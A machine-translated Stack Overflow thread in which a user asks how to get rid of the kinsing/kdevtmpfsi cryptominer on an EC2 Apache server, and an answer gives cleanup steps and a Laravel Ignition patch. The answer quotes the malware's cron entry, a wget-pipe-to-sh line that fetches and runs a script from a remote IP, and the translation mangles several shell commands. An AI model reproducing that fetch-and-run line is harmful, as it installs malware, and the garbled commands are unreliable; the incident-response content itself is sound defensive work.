关闭。此问题不符合堆栈溢出准则。它目前不接受答案。
<hr class=“my12大纲无baw0 bb bc-POWER-400”/
想改进此问题吗?更新问题,使其成为堆栈溢出的主题。
已于5天前关闭
改进这个问题
我们正在使用一个EC2(Ubuntu)amazon实例来运行Apache。最近我们注意到有一个进程使用整个CPU
我们通过以下步骤将其删除
[[email protected]]#系统控制状态25177
● session-5772.scope-用户根目录的session 5772
已加载:已加载(/run/systemd/system/session-5772.scope;静态;供应商预设:禁用)
输入:/run/systemd/system/session-5772.scope.d
└─50在systemd logind\x2eservice.conf之后,50在systemd用户会话\x2eservice.conf之后,50-Description.conf,50-SendSIGHUP.conf,50-Slice.conf,50-TasksMax.conf
有效:自2020-01-22星期三16:06:01 CST起有效(已放弃);1小时21分钟前
CGroup:/user.slice/user-0.slice/session-5772.scope
├─19331/var/tmp/kinsing
└─25177/tmp/kdevtmpfsi
Jan 22 16:06:17 Hadoop 002 crontab[19353]:(根目录)替换(根目录)
Jan 22 16:06:17 Hadoop 002 crontab[19354]:(根目录)列表(根目录)
Jan 22 16:06:17 Hadoop 002 crontab[19366]:(根目录)列表(根目录)
Jan 22 16:06:17 Hadoop 002 crontab[19374]:(根目录)替换(根目录)
Jan 22 16:06:17 Hadoop 002 crontab[19375]:(根目录)列表(根目录)
Jan 22 16:06:17 Hadoop 002 crontab[19383]:(根目录)替换(根目录)
Jan 22 16:06:17 Hadoop 002 crontab[19389]:(根目录)替换(根目录)
Jan 22 16:06:17 Hadoop 002 crontab[19390]:(根目录)列表(根目录)
Jan 22 16:06:17 Hadoop 002 crontab[19392]:(根目录)替换(根目录)
Jan 22 16:06:17 Hadoop 002 crontab[19393]:(根目录)列表(根目录)
[[email protected]]#ps-ef | grep kinsing
根19331 1 0 16:06?00:00:04/var/tmp/kinsing
根目录25190 23274 0 17:27分/0 00:00:00 grep--color=auto kinsing
[[email protected]]#ps-ef | grep kdevtmpfsi
根2517719917:27?00:01:47/tmp/kdevtmpfsi
根目录2519723274 0 17:28分/0 00:00:00 grep--color=auto-kdevtmpfsi
[[email protected]]#杀戮-9 19331
[[email protected]]#杀戮-9 25177
[[email protected]]#rm-rf kdevtmpfsi
[[email protected]]#cd/var/tmp/
[[email protected]]#ll
总数16692
-rw-r--r--1根根目录0 Jan 13 19:45 aliyun\u assist\u update.lock
-rwxr-xr-x 1根根目录13176 Dec 20 02:14
-rwxr-xr-x 1根根目录17072128 Jan 19 17:43 kinsing
drwx------3根根根4096 Jan 13 19:50 systemd-private-f3342ea6023044bda27f02261d2582ea3-chronyd.service-O7aPIg
[[email protected]]#rm-rf kinsing
但几分钟后,它又自动启动了。有人知道如何解决这个问题吗
我在Centos 8中遇到了与Laravel相同的问题,这是我删除恶意软件并修补系统所遵循的步骤
从系统中删除恶意软件步骤:
第1步:
删除恶意软件:
使用htop或任何其他进程管理器杀死两个进程(kdevtmpfsi和kinsing——它们可以是同一个名称,但末尾有随机字符)
htop F3搜索服务kdevtmpfsi和kinsing
使用以下命令查找和删除文件:
#find/-iname kdevtmpfsi*-exec rm-fv{};
#find/-iname kinsing*-exec rm-fv{}\;
输出应该如下所示:
已删除'/tmp/kdevtmpfsi962782589'
删除“/tmp/kdevtmpfsi”
删除“/tmp/kinsing”
删除“/tmp/kinsing_oA1GECLm”
第二步:
检查cron作业:
检查是否存在会重新初始化恶意软件的cron作业。
我在:/var/spool/cron/apache>
UBUNTU/var/spool/cron/crontab/www-data
它包括以下内容:
***wget-q-O-http://195.3.146.118/lr.sh |sh>;/dev/null 2>;>;1
第三步:
创建新文件并使其只读:
#touch/tmp/kdevtmpfsi&;touch/tmp/kinsing
#echo“kdevtmpfsi现在很好”gt;/tmp/kdevtmpfsi
#echo“kinsing现在很好”gt;/tmp/kinsing
#chmod 0444/tmp/kdevtmpfsi
#chmod 0444/tmp/kinsing
修补Laravel项目:
第1步:
关闭应用程序调试:
确保.env中的APP_DEBUG属性为false,因为这是漏洞获得访问权限的方式
第二步:
更新点火开关:
将点火开关更新到高于2.5.1的版本,以确保漏洞已修补。
在项目文件夹中运行以下操作:
$composer更新外观/点火